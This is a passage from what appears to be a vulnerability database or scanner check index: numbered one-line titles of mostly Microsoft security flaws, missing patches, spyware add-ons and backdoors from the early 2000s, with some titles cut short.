Explorer allows unauthorized access to XML documents [17645] Microsoft Internet Information Server WebDAV multiple attributes per XML elements cause denial of service [17644] Microsoft ASP.NET Framework bypass security [17635] Microsoft Word improper file parsing buffer overflow [17620] Microsoft Internet Explorer InstallEngineCtl SetCifFile buffer overflow [17542] Microsoft SQL Server data buffer denial of service [17479] Windows Mite backdoor [17408] MyWaySpeedBar attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [17407] DealHelper attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [17402] zSearch attaches to processes of Microsoft Internet Explorer [17395] AdButler spyware attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [17340] Microsoft Word Perfect MS04-027 patch is not installed [17306] Microsoft WordPerfect converter long message buffer overflow [17153] Microsoft System Information (Msinfo32.exe) msinfo_file buffer overflow [17118] Cisco Secure ACS Windows and Solution Engine CSAdmin bypass authentication [17116] Cisco Secure ACS Windows and Solution Engine LEAP RADIUS denial of service [17115] Cisco Secure ACS Windows and Solution Engine CSAdmin HTTP denial of service [17114] Cisco Secure ACS Windows and Solution Engine CSAdmin TCP denial of service [17102] Microsoft Internet Explorer IFRAME information disclosure [17098] Microsoft Outlook Express address information disclosure [17048] Microsoft ISA Server FTP bounce attack [17044] Microsoft Internet Explorer dragDrop allows code execution [17007] Microsoft Internet Explorer address bar spoofing [16872] Microsoft Internet Information Server (IIS) ActivePerl command execution [16857] Microsoft Internet Explorer STYLE tag comment buffer overflow [16805] Microsoft Internet Explorer MS04-025 patch is not installed [16804] Microsoft Internet Explorer MSHTML.DLL GIF file buffer overflow [16709] Microsoft Internet Explorer JavaScript denial of service [16708] Microsoft Outlook Express code execution [16707] Suspicious or malicious windows registry keys and values exist [16696] Microsoft Systems Management Server (SMS) Remote Control Client service denial of service [16692] PHP HTML tags may bypass strip_tag function in Microsoft Internet Explorer and Safari [16681] Microsoft Internet Explorer function redirect cross-site scripting [16678] Microsoft Internet Explorer text file denial of service [16675] Microsoft Internet Explorer popup.show allows attacker to perform actions [16666] Microsoft Java Virtual Machine sandbox restriction bypass [16663] Microsoft Word and Outlook Object tag allows unauthorized access [16656] Microsoft Internet Information Server (IIS) MS04-021 patch is not installed [16648] Microsoft Internet Explorer Shell.Application [16624] Microsoft Internet Explorer ADODB.Stream object is not disabled [16585] Microsoft Outlook Express malformed email header denial of service [16583] Microsoft Exchange Server OWA could allow remote execution of code [16578] Microsoft Internet Information Server (IIS) redirect buffer overflow [16448] Microsoft MN-500 Web administration denial of service [16443] Microsoft Internet Explorer Wildcard DNS entry cross-site scripting [16420] Microsoft Internet Explorer null pointer denial of service [16398] Microsoft Internet Explorer bypass security zone restrictions [16394] Microsoft Internet Explorer ADODB.Stream object code execution [16384] Microsoft ISA Server Web Proxy redirect denial of service [16383] Microsoft ISA Server Basic authentication credentials sent in plain text [16382] Microsoft ISA Server canonicalization error in Rules engine [16380] Microsoft ISA Server Web Proxy SSL denial of service [16361] Microsoft Internet Explorer bypass cross-zone restrictions [16348] Microsoft Internet Explorer Location: header bypass restrictions [16306] Microsoft DirectX DirectPlay denial of service [16205] Microsoft SQL Server buffer overflow exploit attempt detected [16202] Microsoft Internet Explorer buffer overflow exploit attempt detected [16201] Microsoft Internet Information Services buffer overflow exploit attempt detected [16200] Microsoft Exchange Server buffer overflow exploit attempt detected [16189] Microsoft Internet Explorer CSS denial of service [16181] Microsoft Visual Basic Command1_Click buffer overflow [16173] Microsoft Outlook 2003 OLE object bypass restricted security zone [16168] Microsoft Outlook Express SMTP usernames and passwords disclosure [16161] Microsoft Internet Explorer browser URL spoofing [16160] Microsoft Internet Explorer MSHTM.DLL http-equiv META tag denial of service [16147] Microsoft Internet Explorer showHelp CHM file execution [16119] Microsoft Outlook 2000 URL spoofing [16116] Microsoft Outlook VML information disclosure [16104] Microsoft Outlook 2003 predictable file location could allow code execution [16102] Microsoft Internet Explorer and Outlook Express A HREF URL spoofing [16091] Microsoft Internet Explorer file URL could allow an attacker to overwrite registry [16061] Microsoft Internet Explorer SSL certificate spoofing [16058] Microsoft Internet Information Server ASP information disclosure [15906] Microsoft Visual Studio .NET unknown Debugger configuration issue [15859] Microsoft Outlook email ASCII NUL denial of service [15853] Microsoft Internet Explorer OLE object unauthorized print job [15832] Microsoft Internet Explorer IFRAME denial of service [15809] Microsoft Outlook Express MS04-013 patch is not installed [15729] Microsoft SharePoint Portal Server cross-site scripting [15705] Microsoft Outlook Express MHTML URL allows execution of code [15703] Microsoft Jet Database Engine query could execute code [15698] Microsoft Internet Explorer and Outlook Express URL FORM spoofing [15591] Microsoft Visual Studio and Microsoft Visual C++ denial of service [15544] Microsoft Internet Explorer shell: command denial of service [15521] MSN (Microsoft Network) Messenger file transfer [15429] Microsoft Outlook MS04-009 patch is not installed [15427] Microsoft Network Messenger MS04-010 patch is not installed [15414] Microsoft Outlook 2002 mailto URL allows execution of code [15337] Microsoft Internet Explorer cross-frame domain restrictions bypass [15326] Microsoft Internet Explorer Perfect Nav plugin denial of service [15210] Microsoft Internet Explorer BMP bitmap image file integer overflow [15127] Microsoft Internet Explorer and Outlook null character in host name denial of service [15113] Microsoft Virtual PC for Mac allows elevated privileges [15078] Microsoft Internet Explorer vb script reports different errors to obtain information [15006] Microsoft Internet Explorer MS04-004 patch is not installed [14964] Microsoft Internet Explorer file extension spoofing [14845] Microsoft Convert.exe converts FAT32 to NTFS files systems insecurely [14609] ZyncosMark attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14601] WurldMedia attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14594] WinLocator BHO attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14561] spyware VX2.BetterInternet attaches to processes of Microsoft Internet Explorer to obtain information [14560] VX2.BC777(SiteHlprBHO) attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14537] TopSearch attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14529] Thesten attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14522] Surfairy attaches to processes of Microsoft Internet Explorer and opens advertisements [14504] ShopNav Hijacker attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14494] SearchWWW attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass security software [14426] NavExcel attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14425] MyWebSearch Toolbar attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14424] MyFastAccess Toolbar attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14422] MSMediaservice attaches to processes of Microsoft Internet Explorer and could allow an attacker to execute code [14421] MSIEbho-Stub BHO attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14418] MPGCom Toolbar attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14400] Kontiki attaches to processes of Microsoft Internet Explorerand acts as part of the Web browser to bypass software [14396] JAJsoft.CSRS attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14395] iWon attaches to processes of Microsoft Internet Explorer and could allow a remote attacker to execute code [14390] IPInsight attaches to processes of Microsoft Internet Explorer and could allow an attacker to execute code [14389] Invictus MediaUpdate attaches to processes of Microsoft Internet Explorer and could allow an attacker to execute code [14383] IETop100 attaches to processes of Microsoft Internet Explorer and acts as part of the Web browser to bypass software [14380] IDGsearch spyware attaches to processes of Microsoft Internet Explorer and could allow execution of code [14378] IBIS Toolbar attaches to processes of Microsoft Internet Explorer to obtain information [14374] Httper attaches to processes of Microsoft Internet Explorer and allows execution of code [14348] Friend Toolbar attaches to processes of Microsoft Internet Explorer [14342] FindSex attaches to processes of Microsoft Internet Explorer and allows disclosure of information [14340] FavoriteMan attaches to processes of Microsoft Internet Explorer and may allow execution of code [14325] emes-x bho attaches to processes of Microsoft Internet Explorer and may allow execution of code [14316] e2Give attaches to processes of Microsoft Internet Explorer and obtains information [14314] DyFuCA attaches to processes of Microsoft Internet Explorer and obtains information [14256] BDSearch Plugin attaches to processes of Microsoft Internet Explorer and may replace the home page [14252] AutoSearchBHO attaches to processes of Microsoft Internet Explorer [14243] Alexa spyware attaches to processes of Microsoft Internet Explorer [14237] Microsoft URLScan Web server information disclosure [14188] HD Soft Windows FTP Server format string [14187] Microsoft Data Access Components (MDAC) broadcast request buffer overflow [14179] Microsoft Data Access Components (MDAC) MS04-003 patch is not installed [14178] Microsoft ISA Exchange Server 2003 MS04-002 patch is not installed [14177] Microsoft ISA MS04-001 patch is not installed [14167] Microsoft ISA Server 2000 H.323 filter buffer overflow [14137] GoodTech Telnet Server for Windows NT/2000/XP long string denial of service [14130] Microsoft Excel could allow an attacker to bypass the &quot [14129] Microsoft Word, Excel, and PowerPoint could allow an attacker to bypass the &quot [14128] Microsoft Word could allow an attacker to bypass &quot [14127] Microsoft Internet Explorer .lnk shortcuts could allow code execution [14105] Microsoft Internet Explorer showHelp directory traversal [14100] Windows Telnet Server username buffer overflow [14092] Microsoft Internet Explorer &quot [14077] Microsoft Internet Information Server (IIS) fails to properly log HTTP TRACK requests [13975] Microsoft Internet Explorer cache attack allows code execution [13960] FlashGet stores user passwords in plain text in Windows registry [13935] Microsoft Internet Explorer domain URL spoofing [13869] Microsoft Exchange Server OWA could allow unauthorized email account access [13847] Microsoft Internet Explorer download function cache directory disclosure [13846] Microsoft Internet Explorer subframe cross-site scripting [13845] Microsoft Internet Explorer mhtml: URL handler bypass check [13844] Microsoft Internet Explorer method caching perform actions [13809] Microsoft Internet Explorer scrollbar-base-color attribute denial of service [13795] Microsoft SharePoint settings.htm authentication bypass [13779] Microsoft Internet Explorer HTML injection [13682] Microsoft Word macro buffer overflow allows execution of code [13681] Microsoft Excel macro allows attacker to execute code [13680] Microsoft FrontPage Server Extensions SmartHTML Interpreter denial of service [13679] Microsoft Internet Explorer drag and drop could allow an attacker to save file to local system [13678] Microsoft Internet Explorer XML object could allow an attacker to obtain information [13677] Microsoft Internet Explorer script URLs zone bypass [13676] Microsoft Internet Explorer function pointer override zone bypass [13675] Microsoft Internet Explorer ExecCommand zone bypass [13674] Microsoft FrontPage Server Extensions debug buffer overflow [13652] Microsoft Data Access Components GET request [13617] Microsoft Internet Explorer clientCaps behavior could disclose sensitive information [13588] Microsoft Internet Explorer IFRAME tag could allow an attacker to execute files [13501] Microsoft Internet Explorer position: absolute denial of service [13500] Microsoft Word malformed document [13453] Microsoft Internet Information Server 404 error message determines service pack level [13433] Microsoft Exchange SMTP extended verb request denial of service [13432] Microsoft Exchange SMTP extended verb request buffer overflow [13421] Microsoft Exchange Server OWA Compose New Message form cross-site scripting [13403] HP OpenView Operations for Windows remote action [13376] Microsoft Internet Explorer Dynamic HTML behaviors allows an attacker to execute code [13314] Microsoft Internet Explorer popup window containing Object Data tags could allow an attacker to execute code [13300] Microsoft Internet Explorer XML Web page containing Object Data tags could allow an attacker to execute code [13285] Microsoft PowerPoint data manipulation [13242] Microsoft BizTalk Server insecure permissions in BizTalkServerDocs and BizTalkServerRespository directories allow file upload [13207] TM-POP3 Server stores user passwords in plain text in Windows registry [13176] Microsoft Internet Explorer media sidebar could allow an attacker to execute code [13166] Microsoft Internet Explorer history.back function allows attacker to obtain information from a site loaded in a different frame and domain [13165] Microsoft Internet Explorer NavigateAndFind function allows an attacker to obtain information and execute code [13163] Microsoft Internet Explorer window.open function allows an attacker to obtain information and execute code [13162] Microsoft Internet Explorer history.back function allows an attacker to obtain information and execute code [13161] Microsoft Internet Explorer allows an attacker to obtain cookies by opening Web site in _search window [13126] Microsoft ASP.NET could allow an attacker to bypass Request Validation feature [13116] Microsoft IIS MS03-018 patch is not installed on the system [13093] Microsoft Access Snapshot Viewer buffer overflow [13091] Microsoft Office WordPerfect converter buffer overflow [13090] Microsoft Word could allow an attacker to bypass Macro Security Model [13088] Microsoft IIS running RealSecure Server Sensor ISAPI plug-in denial of service [13029] Microsoft Internet Explorer input type tag denial of service [12970] Microsoft Internet Explorer DBCS Type property of Object tag buffer overflow [12962] Microsoft Internet Explorer BR549.DLL ActiveX control buffer overflow [12961] Microsoft Internet Explorer browser cache script injection [12960] Microsoft Internet Explorer Object Data tags could allow an attacker to execute code [12959] Microsoft Data Access Components broadcast request buffer overflow [12914] Microsoft Internet Explorer about:blank page cross-site scripting [12910] Microsoft Visual Studio MCWNDX ActiveX buffer overflow [12872] Microsoft NetMeeting malformed packet denial of service [12783] Microsoft Internet Information Server ASP engine could allow an attacker to upload malicious files [12704] Microsoft SQL Server named pipe hijack [12703] Microsoft SQL Server LPC buffer overflow [12702] Microsoft DirectX MIDI buffer overflows [12700] Microsoft SQL Server named pipe denial of service [12687] Microsoft IIS Remote Administration Tool allows attacker to reset administrative password [12686] Microsoft IIS Remote Administration Tool could allow an attacker to obtain valid session IDs [12684] Microsoft Exchange Server OWA Outlook 2003 denial of service [12627] Microsoft ISA homepage function error page cross-site scripting [12590] Microsoft Internet Explorer window.external.AutoScan function cross-site scripting [12538] Microsoft Internet Explorer C:\aux URL denial of service [12532] Microsoft Exchange OWA REFERER header cross-site scripting [12531] Microsoft Exchange OWA could allow an attacker to execute code [12530] Microsoft SQL Server CreateFile API function allows attacker to gain privileges [12512] IglooFTP PRO for Windows FTP banner, Username, Password, and Account functions buffer overflow [12490] Microsoft NetMeeting &quot [12444] Microsoft Internet Explorer HTML conversion library buffer overflow [12336] Microsoft Internet Explorer Homepage function could allow command execution [12334] Microsoft Internet Explorer MSXML cross-site scripting [12249] Microsoft Internet Explorer FTP implementation &quot [12193] Microsoft Internet Explorer &quot [12184] Microsoft Internet Explorer Type property of Object tag buffer overflow [12137] Microsoft Internet Explorer URL spoofing [12100] Microsoft IIS long WebDAV requests containing XML denial of service [12099] Microsoft IIS Response.AddHeader denial of service [12098] Microsoft IIS Server-Side Include (SSI) long file name buffer overflow [12097] Microsoft IIS redirect error cross-site scripting [12089] Microsoft SQL Server Jet OLE DB Provider is enabled [12043] Microsoft Internet Explorer Script Engine denial of service [12019] Microsoft Internet Explorer FRAME or IFRAME bypass restrictions [11946] Microsoft Internet Explorer anchorClick behavior denial of service [11918] Microsoft IIS authentication mechanism could allow an attacker to determine valid user account names [11901] Microsoft BizTalk Server 2002 SQL injection [11900] Microsoft BizTalk Server 2002 HTTP Receiver function buffer overflow [11873] Microsoft Internet Explorer, Outlook, and FrontPage shlwapi.dll library denial of service [11854] Microsoft Internet Explorer plug-in.ocx Load method buffer overflow [11849] Microsoft Internet Explorer Modal Dialog could allow an attacker to read files [11848] Microsoft Internet Explorer improper rendering of third party file types could allow code execution [11847] Microsoft Internet Explorer File Upload control allows attacker to obtain information [11846] Microsoft Internet Explorer URLMON.DLL library buffer overflow [11805] Microsoft Internet Explorer OBJECT tag denial of service [11776] Microsoft Active Directory insecure permissions on SYSTEM-account [11752] Microsoft ISA and Proxy Server Firewall and Winsock Proxy service denial of service [11751] Microsoft VM ByteCode Verifier improper validation of code [11589] Microsoft ActiveSync &quot [11576] Microsoft ISA DNS intrusion detection application filter denial of service [11537] Microsoft IIS WebDAV service is running on the system [11533] Microsoft IIS WebDAV long request buffer overflow [11507] Microsoft Internet Explorer .mht buffer overflow [11466] Microsoft Internet Explorer embedded HTML EXE file execution [11430] Microsoft Locator service is running on the system [11411] Microsoft Outlook CODEBASE value allows remote program execution [11264] Microsoft Internet Explorer MS03-004 patch is not installed on the system [11259] Microsoft Internet Explorer showHelp() zone bypass [11258] Microsoft Internet Explorer dialog box zone bypass [11250] Microsoft Internet Explorer dragDrop() method could be used to read local files [11133] Microsoft Outlook 2002 using V1 Exchange Server Security certificates transmits plaintext emails [10945] Microsoft Internet Explorer multimedia file URL cross-site scripting [10943] Gallery Windows XP Publishing feature could be used to execute commands [10883] Microsoft Internet Explorer Browser Helper Object (BHO) could disclose information [10833] Microsoft VM JDBC APIs could allow unauthorized database access [10822] Microsoft Word and Excel stores ODBC passwords and usernames in plain text [10809] Microsoft Internet Explorer MS02-068 patch is not installed on the system [10798] Microsoft Internet Explorer dialog window style parameter can access a user`s local security zone [10763] Microsoft Outlook malformed email header denial of service [10760] Microsoft RDS has been enabled on the system [10732] Sun Solaris OpenWindows mailtool(1) denial of service [10723] SSH Windows client URL buffer overflow [10674] Microsoft Internet Explorer IFRAME dialogArguments object can access a user`s local security zone [10670] Microsoft Data Access Components (MDAC) MS02-065 patch is not installed [10669] Microsoft Data Access Components RDS Data Stub client heap buffer overflow [10665] Microsoft Internet Explorer OBJECT tag could be used to read TIF folder name [10662] Microsoft Internet Explorer PNG inflate_fast() buffer overflow [10659] Microsoft Data Access Components RDS Data Stub server heap buffer overflow [10590] Microsoft Internet Information Server (IIS) MS02-062 patch [10588] Microsoft VM HTML Applet tag denial of service [10587] Microsoft VM passed HTML object denial of service [10586] Microsoft VM CabCracker class could allow an attacker to load .cab archives [10585] Microsoft VM StandardSecurityManager class restriction bypass [10584] Microsoft VM Java Applet codebase tag could be used to read files [10583] Microsoft VM INativeServices could be used to access clipboard contents [10582] Microsoft VM INativeServices could allow unauthorized memory access [10581] Microsoft VM Java Applet could disclose path to current directory [10580] Microsoft VM Java Applet class loader buffer overflow [10579] Microsoft VM URL redirect cross-domain Java Applet execution [10542] Microsoft SQL Server login accounts use weak encryption algorithm [10535] EventSave and EventSave+ could allow event loss from the Windows NT log [10504] Microsoft IIS script source access could be bypassed to upload .COM files [10503] Microsoft IIS WebDAV memory allocation denial of service [10502] Microsoft IIS out-of-process applications could be used to gain elevated privileges [10501] Microsoft IIS administrative Web pages cross-site scripting [10500] Microsoft Outlook Express fails to delete messages from dbx files [10459] Microsoft Internet Explorer could allow an attacker to bypass cookie restrictions [10443] Microsoft Internet Explorer saved &quot [10440] Microsoft Internet Explorer clipboardData cached object DOM access [10439] Microsoft Internet Explorer execCommand cached object DOM access [10438] Microsoft Internet Explorer getElementsByTagName cached object DOM access [10437] Microsoft Internet Explorer getElementsByName cached object DOM access [10436] Microsoft Internet Explorer getElementById cached object DOM access [10435] Microsoft Internet Explorer elementFromPoint cached object DOM access [10434] Microsoft Internet Explorer createRange cached object DOM access [10433] Microsoft Internet Explorer external cached object DOM access [10432] Microsoft Internet Explorer showModalDialog cached object DOM access [10388] Microsoft SQL Server Web tasks could allow elevated privileges [10371] Microsoft Internet Explorer oIFrameElement.Document cross-domain script execution [10370] Microsoft IIS HTTP HOST header denial of service [10342] Microsoft TSAC ActiveX connect.asp cross-site scripting [10338] Microsoft Outlook Express S/MIME certificate buffer overflow [10318] Microsoft Content Management Server (MCMS) ManualLogin.asp REASONTXT cross-site scripting [10294] Microsoft IIS .idc extension error message cross-site scripting [10290] Microsoft Internet Explorer saved &quot [10259] Microsoft Services for Unix (SFU) invalid RPC packet denial of service [10258] Microsoft Services for Unix (SFU) RPC parameter size buffer overflow could crash the server [10257] Microsoft SQL Server Agent scheduled jobs could create malicious output files [10255] Microsoft SQL Server Database Consistency Checker (DBCC) buffer overflow [10195] Microsoft FrontPage Server Extensions (FPSE) 2002 SmartHTML Interpreter buffer overflow [10194] Microsoft FrontPage Server Extensions (FPSE) 2000 SmartHTML Interpreter denial of service [10186] Microsoft Active Data Objects (ADO) buffer overflow [10184] Microsoft IIS 5.0 resource utilization denial of service [10180] Microsoft Internet Explorer fails to report an expired SSL CA certificate [10179] Microsoft Virtual Machine (VM) JDBC class allows access to ODBC data sources [10158] Microsoft Internet Explorer HTTP redirect bypass restrictions [10155] Microsoft Word INCLUDEPICTURE field in shared documents can be used to read other files [10135] Microsoft Virtual Machine (VM) XML methods can be accessed [10134] Microsoft Virtual Machine (VM) JDBC handle validation could crash Internet Explorer [10133] Microsoft Virtual Machine (VM) JDBC classes can execute local DLLs [10119] Microsoft NetMeeting RDS local session hijacking [10117] Microsoft Internet Explorer FTP URL denial of service [10067] Microsoft Outlook Express &quot [10066] Microsoft Internet Explorer frame/iframe javascript: URL cross-domain script execution [10044] Cisco VPN Client Windows utility program could decipher the group password [10039] Microsoft Internet Explorer URL encoded forward-slash &quot [10035] Microsoft Visual FoxPro could allow an attacker to execute an application [10033] Microsoft Outlook Express S/MIME spoofed CA certificate man-in-the-middle attack [10031] Microsoft SQL Server Resolution Service stack buffer overflow [10021] Cisco VPN 3000 series concentrators Windows PPTP client denial of service [10012] Microsoft SQL Server sp_MSSetServerProperties and sp_MSsetalertinfo stored procedures allow &quot [10008] Microsoft Word INCLUDETEXT field in shared documents can be used to read other files [9938] Microsoft Internet Explorer &quot [9937] Microsoft Internet Explorer file download origin spoofing [9936] Microsoft Internet Explorer XML redirect could be used to read files [9935] Microsoft Legacy Text Formatting ActiveX control buffer overflow [9934] Microsoft TSAC ActiveX control buffer overflow [9931] Microsoft Office Web Components MS02-044 patch is not installed on the system [9909] MySQL logging disabled by default on Windows [9907] Microsoft FTM ActiveX control could be used by an attacker to upload and download files [9906] Microsoft FTM ActiveX control &quot [9893] Microsoft SQL Server Agent jobs could be used to create and overwrite files [9886] Microsoft Internet Explorer Java logging could be used to execute code [9885] Microsoft Internet Explorer XML Datasource applet could be used to read local files [9883] Microsoft Internet Explorer Google Toolbar search request denial of service [9881] Microsoft Internet Explorer &quot [9877] Microsoft DirectX Files Viewer control buffer overflow [9857] Microsoft SQL Server XPs with weak permissions could allow elevated privileges [9848] Microsoft Internet Explorer HTM script execution [9791] Microsoft Exchange IIS license exhaustion denial of service [9789] Microsoft Exchange MSRPC denial of service [9788] Microsoft SQL Server pre-authentication buffer overflow [9785] Microsoft Content Management Server (MCMS) resource request SQL injection [9784] Microsoft Content Management Server (MCMS) Web authoring file execution [9783] Microsoft Content Management Server (MCMS) authentication buffer overflow [9734] Microsoft SQL Server MDAC OpenRowSet buffer overflow [9732] Microsoft Office Web Components (OWC) could allow a remote attacker to execute code [9724] Microsoft Outlook Express could allow the execution of XML files within the Temporary Internet File (TIF) directory [9667] Microsoft SQL Server MS02-038 patch [9666] Microsoft SQL Server MS02-039 patch [9662] Microsoft SQL Server Resolution Service keep-alive function denial of service [9661] Microsoft SQL Server Resolution Service heap buffer overflow [9660] Microsoft SQL Server replication stored procedures are vulnerable to SQL Injection [9659] Microsoft SQL Server Database Consistency Checker (DBCC) utilities have multiple buffer overflows [9658] Microsoft Exchange Server Internet Mail Connector (IMC) EHLO buffer overflow [9657] Microsoft Metadirectory Services (MMS) could allow unauthorized access to the data repository [9653] Microsoft Internet Explorer CTRL key could be used to upload files [9643] Microsoft Outlook Express malformed MIME headers could allow file type, size, and icon spoofing [9617] Microsoft Internet Explorer JavaScript page transitions denial of service [9580] Microsoft IIS SMTP service encapsulated addresses could allow mail relaying [9537] Microsoft Internet Explorer WebBrowser control OBJECT property could allow cross domain scripting [9531] Microsoft Internet Explorer CLASSID denial of service [9529] Microsoft Foundation Class Library ISAPI Buffer Overflow [9525] Microsoft Outlook PGP plug-in heap buffer overflow could allow remote code execution [9524] Microsoft SQL Server could store some passwords insecurely [9523] Microsoft SQL Server service account insecure registry permissions [9522] Microsoft SQL Server bulk data insert buffer overflow [9426] Microsoft Commerce Server new variant of AuthFilter ISAPI filter buffer overflow [9425] Microsoft Commerce Server OWC package installer folder permissions could allow remote command execution [9424] Microsoft Commerce Server OWC package installer buffer overflow [9423] Microsoft Commerce Server Profile Service API buffer overflow [9399] Microsoft Excel XSL Stylesheet allows attacker to execute script code [9398] Microsoft Excel allows macro execution if opened using hyperlink with drawing shape object [9397] Microsoft Excel execute inline macros [9367] Microsoft Internet Explorer Cascading Style-Sheet (CSS) bold font denial of service [9362] Microsoft Visual Studio .NET (Korean version) includes a Nimda-infected file [9346] Log Explorer for Microsoft SQL Server xp_logattach buffer overflow [9345] Microsoft SQL Server pwdencrypt() buffer overflow [9329] Microsoft SQL Server SQLXML XML tag script injection [9328] Microsoft SQL Server SQLXML ISAPI buffer overflow [9327] Microsoft IIS ISAPI HTR chunked encoding heap buffer overflow [9326] Microsoft RAS phonebook local buffer overflow [9290] Microsoft Internet Explorer FTP server name cross-site scripting [9276] Microsoft ASP.NET StateServer buffer overflow [9247] Microsoft Internet Explorer Gopher client malformed reply buffer overflow [9195] Microsoft Exchange message attribute denial of service [9187] Microsoft Passport SDK 2.1 Component Configuration Document (CCD) permission [9159] Microsoft Active Directory zero page length denial of service [9154] Microsoft Data Engine (MSDE) and Microsoft SQL Server 2000 Desktop Engine have a default blank &quot [9146] Microsoft Passport SDK 2.1 events reporting disabled [9123] Microsoft IIS 5.0 Log Files Directory Permission Exposure [9122] Microsoft Internet Explorer JavaScript self.location refresh denial of service [9121] Microsoft Internet Explorer for Unix could cause the CDE or X Server to crash when scrolling Chinese characters [9101] Microsoft Internet Explorer cookies with embedded script could be used to access other cookies on the local system [9094] Microsoft Passport Manager PASSPORTLOG.LOG exposure [9091] Microsoft Passport Manager verbose mode exposure [9090] Microsoft Internet Explorer MS02-023 patch is not installed on the system [9089] Microsoft Internet Explorer and Outlook Express BGSOUND tag could allow an attacker to obtain sensitive information [9088] Microsoft Internet Explorer and Outlook Express IFRAME tag could allow attacker to send data to a DOS device [9087] Microsoft Internet Explorer and Outlook Express BGSOUND DOS device reference could cause a denial of service [9086] Microsoft Internet Explorer &quot [9085] Microsoft Internet Explorer &quot [9084] Microsoft Internet Explorer NetBIOS connection could allow rendering of Web sites with incorrect security zone [9081] InfraTrojan backdoor allows remote access to Windows [9077] Microsoft Word Mail Merge variant could allow an attacker to execute arbitrary commands [9068] Microsoft Passport SDK 2.1 registry default permission exposure [9067] Microsoft Passport SDK 2.1 default test site exposure [9066] Microsoft Passport SDK 2.1 Adventure Works Sample Site exposure [9065] Microsoft Passport SDK 2.1 Adventure Works Sample Site global.asa file default permission exposure [9064] Microsoft Passport SDK 2.1 default time window exposure [9022] Intruzzo backdoor allows remote access to Windows computers [8974] Cisco VPN Client insecure installation on Windows XP [8969] Microsoft Internet Explorer and Outlook Express malformed XBM file denial of service [8947] Microsoft Baseline Security Analyzer creates a plaintext security report file [8941] Microsoft Internet Explorer JavaScript recursive onError event denial of service [8926] Microsoft Outlook Express POP3 message containing two &quot [8917] Storing of credentials or .NET passports for network authentication is allowed in Windows XP [8904] Microsoft Internet Explorer self-referenced OBJECT directive denial of service [8887] Digital encryption of secure data is not enabled in Windows XP [8886] Anonymous enumeration of SAM accounts is enabled in Windows XP [8885] Digital encryption or signing of secure data is disabled in Windows XP [8868] Microsoft Internet Explorer dialog window cross-site scripting [8862] Microsoft BackOffice Server allows attacker to bypass authentication for Web administration pages [8853] Microsoft IIS CodeBrws.asp sample script can be used to view arbitrary file source code [8851] Microsoft Internet Explorer for Macintosh could allow remote AppleScript execution [8850] Microsoft Internet Explorer and Office for Macintosh HTML file:// directive buffer overflow [8844] Microsoft Internet Explorer history allows URLs using the JavaScript protocol [8816] Microsoft Internet Explorer does not clear local Web cache [8815] Microsoft VBScript ActiveX Word object denial of service [8811] Microsoft IIS MS02-018 patch is not installed on the system [8810] Microsoft Outlook allows users access to blocked attachments [8808] Microsoft Outlook Express allows attacker to create false attachment by changing icon [8804] Microsoft IIS redirected URL error cross-site scripting [8803] Microsoft IIS HTTP error page cross-site scripting [8802] Microsoft IIS Help File search cross-site scripting [8801] Microsoft IIS FTP session status request denial of service [8800] Microsoft IIS FrontPage Server Extensions and ASP.NET ISAPI filter error handling denial of service [8799] Microsoft IIS HTR ISAPI ISM.DLL extension buffer overflow [8798] Microsoft IIS SSI safety check buffer overflow [8797] Microsoft IIS ASP HTTP header parsing buffer overflow [8796] Microsoft IIS ASP data transfer heap buffer overflow [8795] Microsoft IIS ASP chunked encoding heap buffer overflow [8786] Microsoft OWC DataSourceControl component could allow an attacker to verify a file`s existence using the &quot [8785] Microsoft OWC Spreadsheet component could allow an attacker to verify a file`s existence using the &quot [8784] Microsoft OWC Chart component could allow an attacker to verify a file`s existence using the &quot [8779] Microsoft OWC Spreadsheet component &quot [8778] Microsoft OWC Spreadsheet component &quot [8777] Microsoft OWC Spreadsheet component &quot [8740] Microsoft Internet Explorer Cascading Style Sheets (CSS) can be used to read portions of local files [8711] Microsoft Office XP spreadsheet component host() function cross-application scripting [8708] Microsoft Outlook 2000 and 2002 executes embedded script in object tag when replying or forwarding HTML mail [8701] Microsoft Internet Explorer cookie allows remote attacker to execute script code in Local Computer zone [8681] Microsoft Exchange OWA using RSA Security SecurID authentication bypass [8667] Microsoft Internet Explorer and Outlook could allow the execution of files within Temporary Internet Files (TIFs) [8658] Microsoft Internet Explorer DYNSRC information disclosure [8615] Microsoft Outlook image tags allows remote attacker to bypass cookie settings [8613] Microsoft Outlook allows remote attacker to embed JavaScript in URLs using HREF attribute [8611] Microsoft Outlook IFRAME tags allows malicious Web sites to embed URLs [8589] Apache HTTP Server for Windows DOS batch file remote command execution [8488] Microsoft Internet Explorer JavaScript location.replace loop denial of service [8480] Sun Java Runtime Environment and Microsoft Virtual Machine (VM) Bytecode Verifier could allow a Java Applet to bypass security restrictions [8473] Microsoft Internet Explorer URL encoded characters could allow an attacker to access cookie information [8471] Microsoft Internet Explorer dotless IP variant could allow rendering of Web sites with incorrect Security Zone [8385] Microsoft IIS specially-crafted request reveals IP address [8382] Microsoft IIS authentication error messages reveal configuration information [8370] ARCserve backup client and Inoculan AV client for Microsoft Exchange stores plain text account information in exchverify.log [8362] Microsoft FrontPage form_results.txt is world readable [8359] Microsoft SQL Server multiple extended stored procedure buffer overflows [8356] Microsoft Outlook X-UIDL: header denial of service [8351] Sun Java Runtime Environment and Microsoft Virtual Machine (VM) Java Applet could be used to redirect browser traffic when using a proxy [8341] Microsoft Internet Explorer 4.0 long OBJECT CLASSID denial of service [8320] RealNetworks RealPlayer for Windows invalid .mp3 file denial of service [8280] Matrix screen saver for Windows 95 bypass password protection [8254] Microsoft 